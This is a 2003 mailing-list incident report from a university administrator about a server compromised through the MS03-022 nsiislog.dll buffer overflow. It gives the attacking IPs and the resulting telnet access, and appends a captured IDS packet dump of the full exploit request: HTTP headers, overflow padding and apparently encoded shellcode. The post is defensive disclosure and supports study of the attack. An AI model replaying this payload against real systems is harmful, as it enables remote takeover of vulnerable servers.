Successful attack using MS03-022 vuln

Mike Iglesias iglesias at draco.acs.uci.edu
Wed Sep 24 16:42:49 GMT 2003


We've been seeing probing against web servers looking for
/scripts/nsiislog.dll, which is used by Windows Media Services to
deliver multicast streaming media (nsiislog.dll is the subject of MS03-022,
which fixes a buffer overflow in it).  The probes are usually a "GET
/scripts/nsiislog.dll".  

We have also seen some "POST /scripts/nsiislog.dll" that look like
this:

POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
Accept: */*{D}{A}
User-Agent: NSPlayer/4.1.0.3917{D}{A}
Content-Type: text/plain{D}{A}
Content-Length: 9996{D}{A}
Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
Connection: Close{D}{A}
{D}{A}
MX_STATS_LogLine: *** huge line to cause a buffer overflow ***

The huge MX_STATS_LogLine up until today did not carry much other than
repeated hex 'cc' bytes.

Today we had a system successfully hacked via the buffer overflow.  About
20 seconds after the "POST" attack, they had a telnet session open using
port 34816 on the target system.  I cannot tell what they did to the
system once they had access.

The attacks came from 213.129.194.25 and 80.56.228.218 (both in the
Netherlands).  I've appended a packet dump from our Dragon IDS below
in case anyone finds it useful.


Mike Iglesias                          Email:       iglesias at draco.acs.uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069

POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
Accept: */*{D}{A}
User-Agent: NSPlayer/4.1.0.3917{D}{A}
Content-Type: text/plain{D}{A}
Content-Length: 9996{D}{A}
Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
Connection: Close{D}{A}
{D}{A}
MX_STATS_LogLine: {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
<repeated lines removed>
{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{EB}{2}{EB}{5}{E8}{F9}{FF}{FF}{FF}
[{81}{EB}MC"{11}{8B}{C3}{5}fC"{11}f{B9}{15}{3}{80}0{FB}@g{E2}{F9}3{A3}{F9}{FB}r
fS{6}{4}{4}vf7{6}{4}{4}{A8}@{F6}{BD}{D9}{EA}{F8}fS{6}{4}{4}{A8}{93}{FB}{FB}
{4}{4}{13}{91}{FA}{FB}{FB}C{CD}{BD}{D9}{EA}{F8}~S{6}{4}{4}{AB}{4}n7{6}{4}
{4}{F0};{F4}{7F}{BE}{FA}{FB}{FB}vf;{6}{4}{4}{A8}@{BA}{BD}{D9}{EA}{F8}fS{6}{4}
{4}{A8}{AB}{13}{CC}{FA}{FB}{FB}v~{8F}{5}{4}{4}{AB}{93}{FA}{FA}{FB}{FB}{4}nK{6}
{4}{4}{C8} {A8}{A8}{A8}{91}{FD}{91}{FA}{91}{F9}{4}n;{6}{4}{4}r~{A7}{5}{4}
{4}{9D}<~{9F}{5}{4}{4}{F9}{FB}{9D}<~{9D}{5}{4}{4}s{FB}<~{93}{5}{4}{4}{FB}
{FB}{FB}{FB}vf{9F}{5}{4}{4}{91}{EB}{A8}{4}N{A7}{5}{4}{4}{4}nG{6}{4}{4}
{F0};{8F}{E8}vn{9C}{5}{4}{4}{5}{F9}{{C1}{FB}{F4}{7F}F{FB}{FB}{FB}{10}/{91}{FA}
{4}N{A7}{5}{4}{4}{4}nC{6}{4}{4}{F0};{F4}~^{FB}{FB}{FB}<~{9B}{5}{4}{4}{EB}
{FB}{FB}{FB}v~{9B}{5}{4}{4}{AB}v~{9F}{5}{4}{4}{AB}{4}N{A7}{5}{4}{4}{4}
nO{6}{4}{4}r~{A3}{5}{4}{4}{7}vF{F3}{5}{4}{4}{C8};B{BF}{FB}{FB}{FB}{8}Q
<~{CF}{5}{4}{4}{FB}{FA}{FB}{FB}p~{A3}{5}{4}{4}r~{BF}{5}{4}{4}r~{B3}{5}{4}
{4}r~{BB}{5}{4}{4}<~{F3}{5}{4}{4}{BF}{FB}{FB}{FB}{C8} v~{3}{6}{4}{4}{AB}
v~{F3}{5}{4}{4}{AB}{A8}{A8}{93}{FB}{FB}{FB}{F3}{91}{FA}{A8}{A8}C{8C}{BD}{D9}{EA}
{F8}~S{6}{4}{4}{AB}{A8}{4}n?{6}{4}{4}{4}N{A3}{5}{4}{4}{4}nW{6}{4}{4}
{12}{A0}{4}{4}{4}{4}n3{6}{4}{4}{13}v{FA}{FB}{FB}3{EF}{FB}{FB}{AC}{AD}{13}{FB}
{FB}{FB}{FB}z{D7}{DF}{F9}{BE}{D9}{EA}C{E}{BE}{D9}{EA}{F8}{FF}{DF}x?{FF}{AB}{9F}{9C}
{4}{CD}{FB}{FB}r{9E}{3}{13}{FB}{FB}{FB}{FB}z{D7}{DF}{D8}{BE}{D9}{EA}C{AC}{BE}{D9}
{EA}{F8}{FF}{DF}x?{FF}r{BE}{7}{9F}{9C}r{DD}{FB}{FB}p{86}{F3}{9D}z{C4}{B6}{A1}{8E}
{F4}p{C}{F8}{8D}{C7}z{C5}{AB}{BE}{FB}{FB}{8E}{F9}{10}{F3}z{14}{FB}{FB}{FA}{FB}{10}
{19}r{86}{B}r{8E}{17}p{86}{F7}Bm{FB}{FB}{FB}{C9};{9}Ur{86}{F}p4{D0}{B6}{F7}p{AD}
{83}{F8}{AE}{B}p{A1}{DB}{F8}{A6}{B}{C8};p{C0}{F8}{86}{B}p{8E}{F7}{AA}{8}]{8E}
{FE}x?{FF}{10}{F1}{A2}x8{FF}{BB}{C0}{B9}{E3}{8E}{1F}{C0}{B9}{E3}{8E}{F9}{10}{B8}p
{89}{DF}{F8}{8E}{B}*{1B}{F8}={F4}L{FB}p{81}{E7}:{1B}{F9}{F8}{BE}{B}{F8}<p{FB}{F8}
{BE}{B}p{B6}{F}r{B6}{F7}p{A6}{EB}r{F8}x{96}{EB}{FF}p{8E}{17}{{C2}{FB}{8E}|{9F}{9C}
t{FD}{FB}{FB}x?{FF}{A5}{A4}29{F7}{FB}p{86}{B}{12}{99}{4}{4}{4}3{FB}{FB}{FB}p{BE}
{EB}zSg{FB}{FB}{FB}{FB}{FB}{FA}{FB}C{FB}{FB}{FB}{FB}28{B7}{94}{9A}{9F}{B7}{92}{99}
{89}{9A}{89}{82}{BA}{FB}{BE}{83}{92}{8F}{AB}{89}{94}{98}{9E}{88}{88}{FB}{B8}{89}{9E}
{9A}{8F}{9E}{AB}{89}{94}{98}{9E}{88}{88}{BA}{FB}{FB}{AC}{A8}{C9}{A4}{C8}{C9}{D5}{BF}
{B7}{B7}{FB}{AC}{A8}{BA}{A8}{94}{98}{90}{9E}{8F}{BA}{FB}{99}{92}{95}{9F}{FB}{97}{92}
{88}{8F}{9E}{95}{FB}{9A}{98}{98}{9E}{8B}{8F}{FB}{AC}{A8}{BA}{A8}{8F}{9A}{89}{8F}{8E}
{8B}{FB}{98}{97}{94}{88}{9E}{88}{94}{98}{90}{9E}{8F}{FB}{FB}{98}{96}{9F}{FB}{E9}{C4}
{FC}{FF}{FF}t{F9}u{F7}3{13}{F0}@



More information about the unisog mailing list